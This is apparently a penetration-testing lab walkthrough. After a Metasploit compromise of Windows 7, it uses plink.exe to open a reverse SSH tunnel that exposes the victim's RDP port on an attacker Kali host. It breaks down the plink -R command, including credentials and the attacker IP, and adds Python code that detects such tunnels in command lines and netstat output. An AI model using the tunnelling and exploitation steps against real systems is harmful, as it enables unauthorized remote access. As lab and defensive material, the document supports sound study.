SSH TUNNELING (II): REMOTE PORT FORWARDING
- Layout for this exercise:
* This exercise is a continuation of the previous one
http://www.whitelist1.com/2017/10/ssh-tunneling-i-local-port-forwarding.html
1 - Exploiting Windows 7
- First of all, Kali detects that Windows 7 is running the vulnerable BadBlue service on port 80:
- Exploiting the Windows 7 device with Metasploit:
2 - SSH Tunneling with REMOTE port forwarding
- Checking that Windows 7 is listening on port 3389 (Remote Desktop Protocol):
- In the same way, Kali detects that port 3389 is open:
- Plink.exe is a command-line connection tool, typically used with the SSH protocol, that lets you talk directly to a program running on the server:
- If plink.exe is not already present on Windows 7 (it is included with PuTTY), it can be transferred from the attacker's Kali machine following these instructions:
http://www.whitelist1.com/2017/10/file-transfers-post-exploitation-with.html
- plink.exe helps us create a reverse SSH tunnel, exposing the Windows 7 RDP port on Kali at port 3390:
- Let's look at the parameters used in the previous command:
plink <- opens the SSH connection
-l root -pw rootpassword <- user and password for the SSH server on Kali
192.168.1.27 <- attacker Kali (the SSH server)
-R <- remote (reverse) port forwarding option
3390 <- listening port opened on Kali
127.0.0.1 <- destination host of the forwarded traffic, resolved on the plink side, i.e. Windows 7's own loopback
3389 <- destination port: RDP on Windows 7
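The -R breakdown above is easy to misread, so here is an added example (not code from the original post) that parses the remote-forwarding spec of an ssh/plink command line and states on which side each endpoint lives. A defender can run the same function over process command lines collected by an endpoint sensor to spot reverse tunnels; the sample command line is constructed to match this exercise, with the password replaced by a placeholder.

```python
"""Added example, not code from the original post: parse the -R option of an
ssh/plink command line and spell out on which side each endpoint lives."""
import shlex
from dataclasses import dataclass
from typing import List


@dataclass
class RemoteForward:
    listen_host: str   # bind address on the SSH server (Kali in the exercise)
    listen_port: int   # port opened on the SSH server
    dest_host: str     # resolved by the SSH client, i.e. the host running plink
    dest_port: int     # service the client connects to on dest_host


def parse_remote_forward(spec: str) -> RemoteForward:
    """Parse '[bind_address:]port:host:hostport', the -R syntax of ssh and plink."""
    parts = spec.split(":")
    if len(parts) == 3:
        bind, port, host, hostport = "localhost", *parts
    elif len(parts) == 4:
        bind, port, host, hostport = parts
    else:
        raise ValueError(f"malformed -R spec: {spec!r}")
    # ssh treats an empty bind address (':3390:...') as "all interfaces"; show it as '*'.
    return RemoteForward(bind if bind else "*", int(port), host, int(hostport))


def find_reverse_tunnels(cmdline: str) -> List[RemoteForward]:
    """Return every -R forward in a command line, written as '-R spec' or '-Rspec'.

    shlex.split is used in POSIX mode; pass posix=False for quoted Windows paths."""
    argv = shlex.split(cmdline)
    found = []
    for i, arg in enumerate(argv):
        if arg == "-R" and i + 1 < len(argv):
            found.append(parse_remote_forward(argv[i + 1]))
        elif arg.startswith("-R") and len(arg) > 2:
            found.append(parse_remote_forward(arg[2:]))
    return found


def describe(fwd: RemoteForward, client: str, server: str) -> str:
    """One-line explanation of where traffic enters the tunnel and where it ends up."""
    return (f"{server} listens on {fwd.listen_host}:{fwd.listen_port}; "
            f"each accepted connection is carried inside the SSH session and "
            f"{client} itself connects to {fwd.dest_host}:{fwd.dest_port}")


# Constructed command line matching the exercise; the password is a placeholder.
SAMPLE_CMDLINE = "plink.exe -l root -pw PLACEHOLDER 192.168.1.27 -R 3390:127.0.0.1:3389"

if __name__ == "__main__":
    for fwd in find_reverse_tunnels(SAMPLE_CMDLINE):
        print(describe(fwd, client="Windows 7", server="Kali"))
```

Running it on the sample prints that Kali listens on localhost:3390 and that Windows 7 itself connects to 127.0.0.1:3389, which is why the RDP server on Windows 7 later sees a loopback client rather than Kali's address.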
- Once the tunnel is created, we need another terminal to open an RDP session:
- The new RDP session is opened for the user marie with her password:
- Finally, the attack succeeds: Kali has an RDP session to Windows 7 available on its own desktop:
3 - Analyzing ESTABLISHED connections and corresponding ports with netstat
- Let's check which connections are ESTABLISHED on Windows 7 and which ports are involved:
- The same information, seen from the Kali side:
- There is one connection from Kali to Windows 7 on port 3389 (RDP):
- There is a second connection from Kali to Windows 7 on port 4444 (Metasploit):
- There is a third connection from Kali to Windows 7 on port 22 (SSH):
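To turn the netstat review above into something repeatable, here is an added example (not code from the original post) that parses Windows `netstat -ano` output and flags the three connections this exercise leaves on the victim: the outbound SSH session, the Metasploit handler connection on 4444, and the RDP session that arrives over loopback because the tunnel is delivered by plink itself. The netstat lines are constructed, not the post's screenshot: 192.168.1.30 stands in for the Windows 7 address (not given on the page), 192.168.1.27 is Kali as in the exercise, and the PIDs are made up.

```python
"""Added example, not code from the original post: parse Windows `netstat -ano`
output and flag the connections a reverse-tunnelled RDP session leaves behind."""
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample modelled on `netstat -ano`; addresses other than Kali's and
# all PIDs are made up for the example.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1204
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1316
  TCP    127.0.0.1:3389         127.0.0.1:49211        ESTABLISHED     1316
  TCP    127.0.0.1:49211        127.0.0.1:3389         ESTABLISHED     2732
  TCP    192.168.1.30:49201     192.168.1.27:4444      ESTABLISHED     1204
  TCP    192.168.1.30:49208     192.168.1.27:22        ESTABLISHED     2732
  UDP    0.0.0.0:5355           *:*                                    868
"""

TCP_LINE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+([A-Z_]+)\s+(\d+)\s*$")


class Conn(NamedTuple):
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    state: str
    pid: int


def parse_netstat(text: str) -> List[Conn]:
    """Keep only TCP rows; UDP rows have no state column and are skipped."""
    conns = []
    for line in text.splitlines():
        m = TCP_LINE.match(line)
        if m:
            lip, lport, rip, rport, state, pid = m.groups()
            conns.append(Conn(lip, int(lport), rip, int(rport), state, int(pid)))
    return conns


# Remote ports worth a second look when a workstation connects out to them.
WATCHED_REMOTE_PORTS: Dict[int, str] = {
    22: "outbound SSH from a workstation",
    4444: "default Metasploit handler port",
}


def analyze(conns: List[Conn]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs for ESTABLISHED connections of interest."""
    findings: List[Tuple[int, str]] = []
    established = [c for c in conns if c.state == "ESTABLISHED"]
    ssh_pids = set()
    for c in established:
        if c.remote_port in WATCHED_REMOTE_PORTS and not c.remote_ip.startswith("127."):
            findings.append((c.pid, f"{c.local_ip}:{c.local_port} -> {c.remote_ip}:{c.remote_port}: "
                                    f"{WATCHED_REMOTE_PORTS[c.remote_port]}"))
            if c.remote_port == 22:
                ssh_pids.add(c.pid)
    # RDP reached through a -R tunnel is delivered by the SSH client process, so the
    # RDP server sees a client on 127.0.0.1 instead of the real remote address.
    for c in established:
        if c.remote_ip == "127.0.0.1" and c.remote_port == 3389:
            note = f"RDP client connection from loopback (pid {c.pid}); no remote IP is visible here"
            if c.pid in ssh_pids:
                note += ", and the same pid holds the outbound SSH session: consistent with a reverse tunnel"
            findings.append((c.pid, note))
    return findings


if __name__ == "__main__":
    for pid, note in analyze(parse_netstat(SAMPLE_NETSTAT)):
        print(f"pid {pid}: {note}")
```

The useful correlation is the PID: the process holding the outbound SSH session is the same one making the loopback connection to 3389, which is exactly what a -R forward looks like from the victim's side and what a plain "who is connected to RDP" check would miss.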